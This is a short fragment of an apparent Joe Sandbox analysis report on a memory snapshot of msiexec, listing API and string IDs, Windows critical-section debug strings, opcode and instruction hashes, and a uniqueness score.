                                                                  • Associated: 00000004.00000002.513198532.000000000460F000.00000040.00001000.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_4_2_44f0000_msiexec.jbxd
                                                                  Similarity
                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                                                  • API String ID: 885266447-3903918235
                                                                  • Opcode ID: a09c9d1995939397de76ea7456eb8cfec464ff14529fd894e6b2a4d693b567f8
                                                                  • Instruction ID: 208fc4661a7ef16d9acdc1b1990d79952be269c157d04ceb4a2930ff4bee8623
                                                                  • Opcode Fuzzy Hash: a09c9d1995939397de76ea7456eb8cfec464ff14529fd894e6b2a4d693b567f8
                                                                  • Instruction Fuzzy Hash: AAF0C236200201BBEA211A45DC06F3BBB5AFB84770F244215F628561E1FA62B830E6A4
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%